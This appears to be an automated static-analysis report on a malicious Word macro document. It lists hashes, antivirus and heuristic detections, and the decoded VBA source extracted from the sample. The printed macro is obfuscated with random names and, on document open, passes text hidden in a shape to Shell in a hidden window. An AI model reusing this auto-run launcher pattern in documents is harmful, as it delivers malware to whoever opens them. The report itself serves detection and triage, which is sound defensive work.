Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2f57ea9c2b9eb385…

MALICIOUS

Office (OLE)

Size: 100.4 KB
Created: 2018-12-11 03:58:00
Authoring application: Microsoft Office Word
First seen: 2019-12-09
MD5: 0a6674742893a1d1fdd957436d470e28
SHA-1: bba6699290721b85881b80d7b75d9f70dcd3fefd
SHA-256: 2f57ea9c2b9eb385b5cd1841ef8ae511928169ddcc164fbc65cea0bcabf63c55
Risk Score: 292

Heuristics (10)

  • ClamAV: Doc.Downloader.Generic-6780013-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6780013-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    PBEMwhsQjGfksuqZLNBMiz = CUZbbzpoPFuYQV
    aUrzalbo = Array(rPHfjRFS, CsYGRRqRQ, wVaDvYa, Shell(ScLrv, EzmHn), rzdQslojk)
       jXIFpRsVvvvXSXW = cObnzhYdCVtzzn
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub autoopen()
    TdzZc
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.iec.ch — in document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4265 bytes
SHA-256: 6c508a733a0755379a8d75ad98039c661d73cdf1e4a32b86d0f442513f1f0e33
Detection: ClamAV: No threats found
Obfuscation or payload: likely
155 of 195 identifiers look randomly generated (e.g. 'rquOzdownaPBAmEXWRwkCrHZ') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "LLDKchlpXTNu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
TdzZc
End Sub

Attribute VB_Name = "kzbNrWE"
Function TdzZc()
On Error Resume Next
   fKIFuQTDPAdwuNB = jjjftMSXJHJaZcqWCLrpCYnz
GuLusoBFIGzcfN = rlwmGsdnJHtjVLsKvh
mSGcQSIVRVruXzYwRcAt = dGCnwFftPwEvAbA
   qizQTiaJCSJbCulpaaXldStX = EzEfwVwaNBlMpHRZEo
LZWhZVScIfUYlZvPlWiDwKB = sAckTGMZdCMvhPfJftqusd
musfDZkuAXjoYt = JCTuuiNAhVqUYDUHzPApq
   LiuwOdkXkYibXdkNP = PazijtYoAHQsVjj
qJLzihfzrksfQtR = JUXOQdzBZadcGr
BsSmbBQdiuCqwB = YGqOjAJVoNLKZEDDqzhqnzH
   OJHiRojTNHVvKrfOAOZARl = sksVUOpsuwMLdqrFi
piZZqGwEMbGJiXcuPuZTL = YObwwjBXIJqTbDo
tmXQBNmkRoijbzfPVk = KzsISDpTwSLwZGvA
   QnZaQnpPOjFXKsvPpfkbSlV = sndAFwkirpkvhlihviu
mqunjKKdFGYiRAhdKoJRz = fVIAiDzCjormmBtpUvm
ZkQFdjDEXHUdkLK = ffbGfCajnfNfkVTOirB
   fGRCiLHAMRChqYRiP = BmXAkjrpouSKOATKWWOs
sSSTOzzsrflBSt = siViKtWMiBDCOjCuPWdITFh
lszzOhJwHYRrAfhGVF = RLvkLpkViokbnzzwSwZwB
   RMjcdtwTpIJDVEQNkiDH = KGSowMMVmUMBGZwCVqttpK
VwhqmznlWopGGOnhh = wCowBOfUKPoKNwAnzsOWZX
ipNRSpohIMGrHiYuSLSnXzMa = GTQuSKNbDFGozMiWhfzHHtJ
   pGKKRUpOzYtkPtAZLrFlr = qMocnZopZiLNLcF
intKFbBMPzkRFF = hqjPzVohQaJwKZC
YULMSsjAOLcNpoXjUaiWb = HiqFcjvdrnNPMwus
   siJAkNWcYMfPTDb = zdkCAEROAsuHzOQil
wQQbqcFHRBMvBinv = DlzGnQvArSPdJv
iGGKBXmIzsnQBErMTDNNznGJ = UawJpdHFQRvbct
Set wLHkblcna = LLDKchlpXTNu.Shapes(WYnqBt + "dPwOtbuMCrs" + DYRFUw).TextFrame
   nEzzfTucTFrWYkD = mmYpAQhfAuRDVuZSOfToiPn
rquOzdownaPBAmEXWRwkCrHZ = ZHtQPPXwYwKWSjWGUQui
RcavRNSDzAiUjaWujXL = DcnuBDlZihaMuHHfSUzBEub
   wMfOMODBZJwQCfHiMuMii = AwifBAPXvjdnjjii
krkQwrSRioOIdamGi = jjhMCmBNNmOwaDdc
qtzCGLNTMAORIrhwVwz = YpwOkijDjNKfBzvMlJZYT
   UCltcaARKSOkpPrzNnErW = WrikVrIzHcMaGbnYjqA
jcFVmkioOtpmMwj = LrFIIMLlYOJQMpDNrNoumMz
NUiOnZOKutMskrAWQUzXb = cZpbvwHlGwtVvoiz
   wtJJrvDfvzLntjDcYCjGcDu = BqkhINAEKUbhGVHQYIdlLv
YwfXshvPtzWIALWXi = GdYEVWDvSiTaIcFbLicpIXOF
ikMGFClumFRqUdJUwONvT = uCZznutpiOTWmmqoMfifVWn
   LVLYFaHmJjcSazLozNt = wTGWssSoBBqkrjbmpRNZNsQ
QPDHbcqYjpdrOofMISlHs = aqXYzizUfEDYGdpLMYKSDBG
YBlBRvHIqXoMjDdIZMKZn = hCXwFMzaoZknAwzwCkwvhio
   ZAfFPqRhQEFYUUiAscOimjYG = AwGbfZGrznuoqBFPPRwku
tmhBaWiMsbZVPtLG = fwjUhnLCaISXPaVppCUti
jInuTPUmMEIjTlOqMwVzzOPp = BDjaqrMGfPXjmUwhowOO
ScLrv = wLHkblcna.ContainingRange + SULIB + spJjFP + zWDWz + iIChNn + OoIicZ + MJHuwjH + rfYAkO
   cDFEtBEQTtDLEbTawQTiM = tsczAKazLkljsEqSlXKEN
WInlLvhVwaXvKMbuBtpVhS = YiPjdfvYIUEVULOwiQq
KIztiqrWQOrHDjOCvMDpAC = aGrHimvLFqdOQlWFn
   OqPYMPFzujwUkj = RddWnnliwWhLQNooS
YrBFijBjlMVMPqlKzwI = tQdHRBfDomGudtLpQMzuU
CYNlGqaGNpjhhH = tncEwuwGajWivtmz
   bIYYuLjJLfcjkwsdZi = wVjiLJNCjvkzQwoLuPbC
hilSaALRLACTiX = saMPjIzOafMjwn
OwjiOqwPlIClUuhjiZmSTCMV = hQKnOQOdOmEnDILuKbGdXfU
   FYOjSEfpmrrfrQwudLzwLN = acNMXIbJtajOaDpnLW
HiFihFnjQhvrisBnHErHhL = wFIBXqnYlbYFsUwjHkbLc
iFWZPhiUPFwwHYZEPqcIKPFm = TJYkXFAFzWCfwaF
   uidhfhUTNFGXli = VLAvPNHCrotCpi
FvwSiilpnLiSPHzMfDzz = kQoqnjmtmifoiAK
SzVjWNjhururbNzpiYU = KcqCwwBhDdjHonNDiQjX
   UWNcYtfLlIdKdwWzZvi = KRXRpaBwccZPalKpMO
XMiYrdXmWpcQRHqPDzwmwsh = IiOkrojkLBHGcsjnSofIA
IHjVGqQbvffzPIPm = hIrEPAkmKTIUKNYhvaGAWiq
   MWXurqoEvspKIjWtqEiaI = ATqVjfaovquOvGRPWNKOI
TYoZnczMumcbWEDWGIdGwwQ = kPcahQPucJzShKswpjwIlUk
LAHCkBtUIuoYAYid = izMElowQfRNBIIQiPP
   lTNcUJTLIoOtVwhlnjhqZO = WSVDisjAJkkNwJspPpz
HWvuQsnAwSLNXtqJzGl = coFIklicutRAcoTAWa
pFfBqZXpFTjpJDiwSQnJfJ = GEAKliZqmYTvNwmO
   YTaowfPnRojsThiUXwsiwz = zQHWsJdswcrdlV
kWfNbZHwEZYmpQassbRbYpJW = nviPcEtwbOVwjWcsRCwU
ocXjwCTuWvNJjndZjc = inNCFuJEpjHnNBGwTK
Const EzmHn = 0
   VwaFpiMJBwaNHHwcdwajwJ = qWjYjdjcmiTcWiTjOMRAb
UsBkuczjXqLNkiFKcj = WojoictJMMWjJIUCrW
jEcFGcQIwldDjlfFhlEWIASm = AJCEPjOndwRtjcLNTv
   PbnmNfDwVszPNTTsjHPr = GtrCfrlYtFqCFpnbUaiIzn
JYqbkTjGIKoIhw = ioRacnIMIdjQMjhioTthd
PBEMwhsQjGfksuqZLNBMiz = CUZbbzpoPFuYQV
aUrzalbo = Array(rPHfjRFS, CsYGRRqRQ, wVaDvYa, Shell(ScLrv, EzmHn), rzdQslojk)
   jXIFpRsVvvvXSXW = cObnzhYdCVtzzn
hBJcowAkwZzpEru = JlIEbhbJCzfDTYtWI
OVJvhCcdfNBsTlIGkNqifz = AaoTzRYjbhQcYGNEFcw
End Function